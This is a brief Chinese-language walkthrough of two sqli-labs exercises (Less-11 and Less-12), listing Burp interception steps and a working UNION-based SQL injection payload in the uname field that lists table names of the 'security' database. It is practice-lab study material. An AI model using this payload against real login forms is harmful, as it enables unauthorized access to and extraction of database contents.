一、Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
1,观察index.php中$sql
2,将登陆信息输进去后再用burp拦截
3.repeater一下
4,把uname那改一改
aaaaaa' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security') --+
二、Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)
把les11的aaa'的'去掉,其余步骤同上